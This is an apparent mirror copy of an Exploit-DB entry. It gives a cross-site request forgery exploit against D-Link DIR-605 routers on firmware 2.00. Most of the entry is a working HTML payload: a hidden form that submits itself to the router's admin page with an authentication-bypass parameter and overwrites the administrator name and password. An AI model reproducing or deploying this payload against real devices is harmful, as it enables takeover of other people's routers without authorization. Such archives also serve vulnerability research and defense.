bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/18638.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
673 B
Text
Raw Blame History

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605
This allows unauthroized access to the device and post injections
<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="iqzer0" />
<input type="hidden" name="admin_password1" value="bypass" />
<input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>
Reference in a new issue View git blame Copy permalink